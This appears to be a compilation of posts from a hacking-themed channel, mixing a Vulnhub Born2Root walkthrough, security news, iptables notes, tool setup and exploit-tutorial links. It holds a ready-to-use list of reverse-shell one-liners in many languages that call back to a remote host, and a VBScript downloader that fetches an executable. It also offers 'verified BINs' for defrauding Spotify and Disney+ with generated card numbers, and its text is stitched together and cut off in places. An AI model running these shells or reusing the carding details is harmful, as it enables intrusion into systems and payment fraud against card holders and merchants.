UNDERCODE SECURITY
🦑WELCOME IN UNDERCODE TESTING FOR LEARN HACKING | PROGRAMMING | SECURITY & more..

THIS CHANNEL BY :

@UndercodeTesting
UndercodeTesting.com (official)

@iUndercode
iUndercode.com (iOs)

@Dailycve
DailyCve.com


@UndercodeNews
UndercodeNews.com

🦑FileUpload_Download_Transfer :

File Transfers

- Post exploitation refers to the actions performed by an attacker once some level of control has been gained on his target.

- Simple Local Web Servers

- Run a basic http server, great for serving up shells etc
python -m SimpleHTTPServer 80

- Run a basic Python3 http server, great for serving up shells etc
python3 -m http.server

- Run a ruby webrick basic http server
ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 80, :DocumentRoot => Dir.pwd).start"

- Run a basic PHP http server
php -S $ip:80

- Creating a wget VB Script on Windows:
https://github.com/erik1o6/oscp/blob/master/wget-vbs-win.txt

- Windows file transfer script that can be pasted to the command line. File transfers to a Windows machine can be tricky without a Meterpreter shell. The following script can be copied and pasted into a basic Windows reverse shell and used to transfer files from a web server (the timeout 1 commands are required after each new line):

echo Set args = Wscript.Arguments >> webdl.vbs
timeout 1
echo Url = "http://1.1.1.1/windows-privesc-check2.exe" >> webdl.vbs
timeout 1
echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") >> webdl.vbs
timeout 1
echo dim bStrm: Set bStrm = createobject("Adodb.Stream") >> webdl.vbs
timeout 1
echo xHttp.Open "GET", Url, False >> webdl.vbs
timeout 1
echo xHttp.Send >> webdl.vbs
timeout 1
echo with bStrm >> webdl.vbs
timeout 1
echo .type = 1 ' >> webdl.vbs
timeout 1
echo .open >> webdl.vbs
timeout 1


enjoy❤️👍🏻
✅git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Unix Based Hosts:
#commands

hostname
whoami
uname -a
cat /etc/lsb-release
dmesg | grep Linux
cat /etc/passwd
cat /etc/sudoers
netstat -antup
ps -aux
ps aux | grep root
crontab -l
/sbin/ifconfig -a
iptables -L
arp -e
cat ~/.bash_history
cat ~/.ssh/authorized_keys
mount

- Check installed applications
- Check installed compilers/interpreters


🦑Born2Root: 2: Vulnhub Walkthrough

Penetration Methodology:
- Scanning
- Enumeration
- Exploitation
- Privilege Escalation
- Capture the Flag
- Walkthrough

1) Let's start off with scanning the network to find our target.

netdiscover

2) We found our target: 192.168.1.9

Time to scan the target's IP with nmap.

3) The Nmap scan result shows three major ports open: 22 (SSH), 88 (HTTP) and 111 (RPC).

nmap -A 192.168.1.9

4) Since port 80 is running HTTP, we opened the target IP address in the browser. This gives us an attractive-looking webpage, although after spending a considerable amount of time we found that it is nothing but a distraction; we couldn't find anything of importance on the website.

> So now we moved on to directory bruteforcing to get any hints. The dirb scan gives us the Joomla directory. This is a major breakthrough. Now it's time to exploit the machine through Joomla.

> dirb http://192.168.1.9/

5) Now that we have found the Joomla directory, we browse to it. Here we have the blog made by the author, titled Tim's Blog. This could be a hint for a username; let's keep that in mind. As we can see, there is a login form at the bottom right, so we will have to guess the user credentials.

6) By convention, we try the default credentials first. A quick search tells us that the default username for Joomla is 'admin'. For the password we will have to perform a dictionary attack, so we create a dictionary from the words present on the webpage using 'cewl'.

> cewl http://192.168.1.9/joomla/ > dict.txt

7) Now that we have the dictionary named dict.txt, it's time to perform the bruteforce. We will use Burp Suite for this; to learn more about it, refer to this article. The bruteforce gives us "travel" as the password.


> Now we will use these credentials to log in to Joomla:

Username: admin
Password: travel

8) Now we have logged in to Joomla as the SuperUser. To exploit the Joomla server, we will use the PHP reverse shell that ships with Kali Linux. We move on to the Template section: first click the Extensions option in the menu, then go into the beez3 template and choose Customise. This opens an edit section as shown in the image. Now select index.php and replace its contents with our reverse shell. Remember to change the IP address and/or the port.

9) After editing index.php, save the file by clicking the Save button. Now we have successfully replaced index.php with our reverse shell script, and all that's left to do is run it. To get a session we need a listener where we will receive our reverse shell; we will use netcat to create it as shown in the image given below.

11) After we got the shell, now it was time to enumerate the ma
nc -lvp 1234
python -c 'import pty;pty.spawn("/bin/bash")'
cd /opt
ls
cd scripts
ls
cat fileshare.py

After finding the credentials, all that was left was to log in as Tim. For that we used the su command and gave the following credentials:

Username: tim
Password: lulzlol

12) After logging in as Tim, we ran sudo with the -l parameter to list the sudo rights of the user tim. As we can see in the given image, tim has all the permissions. After this, we traversed into the root directory using the cd command. Here we found the final flag.

su tim
sudo -l
sudo su
cd /root
ls
cat flag.txt


🦑SOME VERIFIED BINS :

> Bin spotify

531443331xxxxxxxx
ip: Netherlands
Change Payment to Egypt
https://namso-gen.com/

> Bin Disney Plus

Bin: 6501597230xxxxxxx
Fecha: Rnd
Cvv: Rnd
Ip: USA🇺🇸
Zip Code: 10001/10080


USE FOR LEARN
 VERIFIED BY US

🦑Reverse shell method for multiple programming languages under Linux

Bash command: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

Perl version: perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Python version: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP version: php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Ruby version: ruby -rsocket -e 'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

nc version: nc -e /bin/sh 10.0.0.1 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
nc xxxx 8888|/bin/sh|nc xxxx 9999

java version (Groovy syntax as written):
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Lua version: lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"


Forwarded from WEB UNDERCODE - PRIVATE
🦑HTTPS encryption is also cracked: the HEIST attack obtains plaintext from encrypted data

> First, what the TCP window is. The TCP window, also called the TCP receive window, is a buffer at each end of a TCP connection that temporarily stores incoming data. Data in this buffer is handed to the application to make room for new incoming data; if the buffer is full, the receiver tells the sender that it cannot accept more data until the buffer has been drained. There are some details involved, but they are all very basic. In general, a device advertises the current size of its TCP window in the TCP header.

> The conditions for exploiting HEIST are very simple: only a few lines of simple JavaScript are needed, and no man-in-the-middle position is required. First, the transmitted sensitive data is captured and saved; the attack can target private information such as bank card numbers, real names, phone numbers and social security numbers, but as we all know most of this data is protected by HTTPS. The attack then probes the size and length of the encrypted data: many websites use compression to speed up page loading, and attackers can exploit that design flaw to decrypt the payload (similar to the BREACH and CRIME attacks).

> HEIST uses new browser APIs (Resource Timing and Fetch) to count the transmission frames and windows sent by the target host. Throughout the process, the researchers use a piece of JavaScript to determine the actual size of an HTTPS response. The malicious HEIST code can then be combined with the BREACH technique to extract the encrypted information from the user's request data.
> It is understood that during Wednesday's demonstration, the security researchers will show how malicious advertisements on the New York Times website can be used to accurately measure the size of encrypted responses. Throughout the process they will use a virtual third-party website (targetwebsite.com) to send the encrypted information. They will also demonstrate how to infer data from the security tokens used to prevent cross-site request forgery attacks.

> Although some websites have deployed basic security measures, most of them cannot prevent HEIST, so this type of attack may become more frequent in the coming years. The current ways to prevent HEIST are to disable either third-party cookies or JavaScript, but both are basic requirements for ordinary users on the web, so the two researchers also hope to find and develop a reasonable and effective solution with the help of the Black Hat conference.
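The length side channel described above (the BREACH principle that HEIST measures from the browser) and the per-response token masking that defeats it, as an added example that is not from the original post: a constructed page is compressed with zlib (standing in for HTTP gzip), the response is measured with the reflected input equal to the real token and to a wrong guess, and the size gap disappears once the token is masked. SECRET, the page template and the XOR masking scheme are constructed assumptions.

```python
import secrets
import zlib

# Constructed demo secret: a 16-byte anti-CSRF token, shown in the page as hex.
SECRET = bytes.fromhex("f3a9c1e07b2d4c55a61f0e9d83b2c7a4")
PREFIX = "csrftoken="


def render(reflected, token_field):
    """Constructed response body: a hidden anti-CSRF field plus user input
    (say, a search string) reflected into the same document."""
    page = (f"<html><body><form><input type='hidden' value='{token_field}'>"
            f"<p>You searched for: {reflected}</p></form></body></html>")
    return page.encode()


def wire_size(body):
    """Bytes an on-path observer sees once the body is DEFLATE-compressed,
    as with gzip HTTP compression; TLS hides content, not length."""
    return len(zlib.compress(body, 6))


def mask_token(secret, mask):
    """Per-response masking (the scheme Django uses): the page carries
    mask || (secret XOR mask) in hex, never the raw secret, so a reflected
    guess of the secret has no identical bytes to back-reference."""
    masked = bytes(s ^ m for s, m in zip(secret, mask))
    return (mask + masked).hex()


def unmask_token(field):
    """Server side: recover the secret from a masked field before comparing."""
    raw = bytes.fromhex(field)
    half = len(raw) // 2
    return bytes(a ^ b for a, b in zip(raw[:half], raw[half:]))


def size_advantage(secret, mask=None):
    """Bytes saved when the reflected input equals the real token rather than
    a wrong guess of the same length. A clear positive gap is the length side
    channel that BREACH, and HEIST's in-browser measurement, rely on."""
    field = PREFIX + (secret.hex() if mask is None else mask_token(secret, mask))
    right = PREFIX + secret.hex()
    # Wrong guess: every hex digit replaced by its complement, so none line up.
    wrong = PREFIX + "".join(f"{15 - int(c, 16):x}" for c in secret.hex())
    return wire_size(render(wrong, field)) - wire_size(render(right, field))


if __name__ == "__main__":
    mask = secrets.token_bytes(len(SECRET))
    print("raw token in page, size gap:   ", size_advantage(SECRET))
    print("masked token in page, size gap:", size_advantage(SECRET, mask))
```

Disabling compression for responses that carry secrets removes the gap as well; masking keeps compression and still leaves nothing for a reflected guess to match.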


🦑Firewall setting method: iptables

Firewall classification:
1. Packet filtering firewall: works at the TCP/IP layer and decides based on the TCP header or IP header data; lower security, high efficiency.
   1) simple (stateless) packet filtering;
   2) stateful packet filtering, which tracks the state of each connection:
      NEW: a connection is being established;
      ESTABLISHED: the connection is established and data is being transmitted;
      INVALID: the packet cannot be matched to any known connection;
      RELATED: a connection associated with an existing one.
2. Application layer gateway firewall: works at the application layer and judges on the actual data carried by the packet; high security, low efficiency.

The firewall works in kernel space, so rules must be defined in kernel space (only the administrator can define the rules, verify whether a command is correct, etc.). The hook framework in the kernel is called Netfilter (network filter).

Address translation (NAT, network address translation):
1) SNAT, source network address translation, performed on POSTROUTING; relies on connection tracking;
2) DNAT, destination address translation, performed on PREROUTING.

Tables:
- filter: filters on the INPUT, OUTPUT and FORWARD chains;
- nat: address translation on the PREROUTING, POSTROUTING and OUTPUT chains;
- mangle: modifies packets on the PREROUTING, INPUT, FORWARD, OUTPUT and POSTROUTING chains; for example the TTL, which every router decrements by 1 on the way, can be incremented by 1 again so that a path probe does not reveal the firewall as an extra hop;
- raw: on the PREROUTING and OUTPUT chains (not explained further here).
Priority order: raw ---> mangle ---> nat ---> filter

iptables command usage:
iptables [-t TABLE] COMMAND CHAIN [criteria] -j ACTION
-t {raw|mangle|nat|filter}, defaults to filter.
COMMAND, rule management category:
-A append to the end of the chain (append);
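A ruleset that puts the tables, chains and connection states above to use, added here as an example and not taken from the original post, in iptables-restore format. Assumed layout (all constructed): eth0 faces the Internet, eth1 is the LAN 192.168.1.0/24, 203.0.113.10 is the firewall's public address, and an internal web server sits at 192.168.1.80. Load with `iptables-restore < rules.v4`.

```iptables
# Constructed example; interface names and addresses are assumptions.
*raw
:PREROUTING ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
COMMIT

*mangle
:PREROUTING ACCEPT [0:0]
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
# Every router decrements TTL by 1; adding 1 back on traffic leaving eth0
# keeps the firewall from showing up as a hop (TTL target, mangle table only).
-A POSTROUTING -o eth0 -j TTL --ttl-inc 1
COMMIT

*nat
:PREROUTING ACCEPT [0:0]
:INPUT ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
# DNAT on PREROUTING: publish the internal web server on the public address.
-A PREROUTING -i eth0 -p tcp --dport 80 -j DNAT --to-destination 192.168.1.80
# SNAT on POSTROUTING: LAN hosts leave with the firewall's public address.
-A POSTROUTING -o eth0 -s 192.168.1.0/24 -j SNAT --to-source 203.0.113.10
COMMIT

*filter
# Default policy DROP on INPUT and FORWARD: anything allowed must be listed.
:INPUT DROP [0:0]
:FORWARD DROP [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -i lo -j ACCEPT
# Stateful filtering: drop INVALID, accept packets of known connections,
# and only then decide which NEW connections may come in (SSH here).
-A INPUT -m conntrack --ctstate INVALID -j DROP
-A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
-A INPUT -i eth0 -p tcp --dport 22 -m conntrack --ctstate NEW -j ACCEPT
-A FORWARD -m conntrack --ctstate INVALID -j DROP
-A FORWARD -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
# nat/PREROUTING already rewrote the destination, so filter sees the internal host.
-A FORWARD -i eth0 -o eth1 -d 192.168.1.80 -p tcp --dport 80 -m conntrack --ctstate NEW -j ACCEPT
-A FORWARD -i eth1 -o eth0 -s 192.168.1.0/24 -m conntrack --ctstate NEW -j ACCEPT
COMMIT
```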


🦑Garmin Connect service goes offline after being attacked by ransomware

> The company behind the Garmin map and navigation service was attacked by ransomware. The attacker encrypted the smartwatch manufacturer's internal servers and forced it to shut down its call center, website and the Garmin Connect service. Almost all Garmin map users rely on that service to synchronize their activities via mobile apps.

🦑2020 multimon-ng is the successor of multimon. It decodes the following digital transmission modes:
Platforms: Linux, Termux

- POCSAG512 POCSAG1200 POCSAG2400
- FLEX
- EAS
- UFSK1200 CLIPFSK AFSK1200 AFSK2400 AFSK2400_2 AFSK2400_3 HAPN4800
- FSK9600
- DTMF
- ZVEI1 ZVEI2 ZVEI3 DZVEI PZVEI
- EEA EIA CCIR
- MORSE CW
- X10

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1️⃣git clone https://github.com/EliasOenal/multimon-ng.git

2️⃣mkdir build

3️⃣cd build

4️⃣qmake ../multimon-ng.pro

5️⃣make

6️⃣sudo make install

7️⃣The installation prefix can be set by passing a 'PREFIX' parameter to qmake, e.g.: qmake multimon-ng.pro PREFIX=/usr/local

8️⃣So far multimon-ng has been successfully built on Arch Linux, Debian, Gentoo, Kali Linux, Ubuntu, OS X, Windows and FreeBSD. (On Windows using the Qt-MinGW build environment, as well as Cygwin and VisualStudio/MSVC.)

> Files can be easily converted into multimon-ng's native raw format using sox, e.g.:
sox -t wav pocsag_short.wav -esigned-integer -b16 -r 22050 -t raw pocsag_short.raw
GNURadio can also generate the format using the file sink in input mode short.

> You can also "pipe" raw samples into multimon-ng using something like:
sox -t wav pocsag_short.wav -esigned-integer -b16 -r 22050 -t raw - | ./multimon-ng -
(note the trailing dash)

9️⃣As a last example, here is how you can use it in combination with RTL-SDR:
rtl_fm -f 403600000 -s 22050 | multimon-ng -t raw -a FMSFSK -a AFSK1200 /dev/stdin

> Packaging

🔟qmake multimon-ng.pro PREFIX=/usr/local

> make

> make install INSTALL_ROOT=/

✅git 2020

🦑bs2.dll manual deletion method

Bs3.dll is related to the BookedSpace adware, used to display pop-up advertisements.

These instructions apply to bs2.dll, bs3.dll and rem00001.dll.

#####
# Instructions:
#####

1. Click Start, choose 'Run'.
2. Type 'cmd'. You should now have a command prompt (DOS) window open.
3. Type cd "%WinDir%\System"
4. regsvr32 /u "..\rem00001.dll"
5. regsvr32 /u "..\bs2.dll"
6. regsvr32 /u "..\bs3.dll"
7. Click Start, choose 'Run'.
8. Type 'regedit'.
9. Find the key
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
and delete the entry 'BookedSpace' (BS2 variant) or 'Bsx3' (BS3 variant).
10. Reboot your computer.
11. Delete the 'rem00001.dll', 'bs2.dll' or 'bs3.dll' file in the Windows folder.
12. Click Start, choose 'Run'.
13. Type 'regedit'.
14. Delete the key

HKEY_LOCAL_MACHINE\Software\Remanent or HKEY_LOCAL_MACHINE\Software\BookedSpace


🦑Comparison of the Petya and WannaCry viruses

1) Encrypted target file type

Petya encrypts fewer file types than WannaCry.

Petya encrypts 65 file types and WannaCry 178, but the common file types are covered by both.


2) Pay the ransom

Petya needs to pay 300 US dollars and WannaCry needs to pay 600 US dollars.

> Are cloud users affected?

As of press time, no affected users have been found on the cloud.

In the early morning of June 28, Alibaba Cloud issued an announcement warning.

3) Analysis of the spread of the ransomware

The Petya ransomware worm spreads through Windows vulnerabilities and infects other computers in the local area network. After the computer is infected with the Petya ransomware virus, certain types of files will be encrypted, causing the computer to fail to operate normally.

> Alibaba Cloud security experts have discovered that Petya ransomware mainly moves laterally through the Windows protocol in the intranet system.

> It spreads mainly through Windows Management Instrumentation (WMI) and PsExec (over the SMB protocol).

> As of now, the hacker's bitcoin account (1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX) holds only 3.39 bitcoins (1 bitcoin = 2459 U.S. dollars) across 33 transactions, indicating that some users have paid the ransom.



🦑Interesting Hacking tutorials & tools :


https://code.google.com/p/pentest-bookmarks/wiki/BookmarksList

http://resources.infosecinstitute.com/creating-undetectable-custom-ssh-backdoor-python-z/

https://blog.netspi.com/netspis-top-cracked-passwords-for-2014/

https://github.com/SpiderLabs/Responder

http://windowssecrets.com/top-story/

http://resources.infosecinstitute.com/in-depth-seh-exploit-writing-tutorial-using-ollydbg/

https://www.corelan.be/index.php/2009/09/05/exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-basic-exploit-development/

http://jbremer.org/mona-101-a-global-samsung-dll/

http://sgros-students.blogspot.sg/2014/09/immunity-debugger-basics-part-1.html

http://sgros-students.blogspot.sg/2014/09/immunity-debugger-basics-part-2.html

http://blog.cobaltstrike.com/2014/03/20/user-account-control-what-penetration-testers-should-know/

http://www.pretentiousname.com/misc/win7_uac_whitelist2.html

http://www.pretentiousname.com/misc/W7E_Source/win7_uac_poc_details.html
http://withinwindows.com/2009/02/05/list-of-windows-7-beta-build-7000-auto-elevated-binaries/

https://www.exploit-db.com/bypassing-uac-with-user-privilege-under-windows-vista7-mirror/

http://security.stackexchange.com/questions/54324/should-i-worry-about-this-uac-bypass-exploit-for-windows-7

http://www.primalsecurity.net/0x8-exploit-tutorial-the-elusive-egghunter/

http://hackerforhire.com.au/

http://n01g3l.tumblr.com/

http://veneetbhardwaj.blogspot.sg/

http://nethekk.blogspot.sg/2014/01/slmail-exploit.html

https://github.com/samratashok/nishang

http://j3rge.blogspot.sg/

https://twitter.com/ithurricanept

https://github.com/hfiref0x

https://zdresearch.com/internet-explorer-version-detect-rop-genration/

http://www.justanotherhacker.com/2011/12/writing-a-stealth-web-shell.html

http://woshub.com/how-to-extract-windows-user-passwords-from-hiberfil-sys/

http://rycon.hu/papers/goldenticket.html

http://www.beneaththewaves.net/Projects/Mimikatz_20_-_Golden_Ticket_Walkthrough.html
